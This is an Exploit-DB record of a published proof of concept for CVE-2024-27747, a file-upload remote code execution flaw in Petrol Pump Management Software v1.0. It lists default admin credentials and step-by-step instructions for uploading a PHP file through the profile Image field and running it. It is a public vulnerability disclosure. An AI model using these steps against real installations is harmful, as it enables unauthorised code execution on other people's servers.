{"source": "https://www.exploit-db.com/exploits/51839", "vulnName": "Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload", "vulnEDBID": "51839", "vulnCVE": "2024-27747", "author": "SHUBHAM PANDEY", "exploitType": "REMOTE", "platform": "PHP", "datePublished": "2024-03-03", "vulnContent": "# Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload \n# Date: 01-03-2024\n# Exploit Author: Shubham Pandey\n# Vendor Homepage: https://www.sourcecodester.com\n# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html\n# Version: 1.0\n# Tested on: Windows, Linux\n# CVE : CVE-2024-27747\n# Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the email Image parameter in the profile.php component.\n# POC:\n1. Here we go to : http://localhost/fuelflow/index.php\n2. Now login with default username=mayuri.infospace@gmail.com and\nPassword=admin\n3. Now go to \"http://localhost/fuelflow/admin/profile.php\"\n4. Upload the phpinfo.php file in \"Image\" field\n5. Phpinfo will be present in \"\nhttp://localhost/fuelflow/assets/images/phpinfo.php\" page\n6. The content of phpinfo.php file is given below:\n<?php phpinfo();?>\n# Reference:\nhttps://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27747.md\n            "}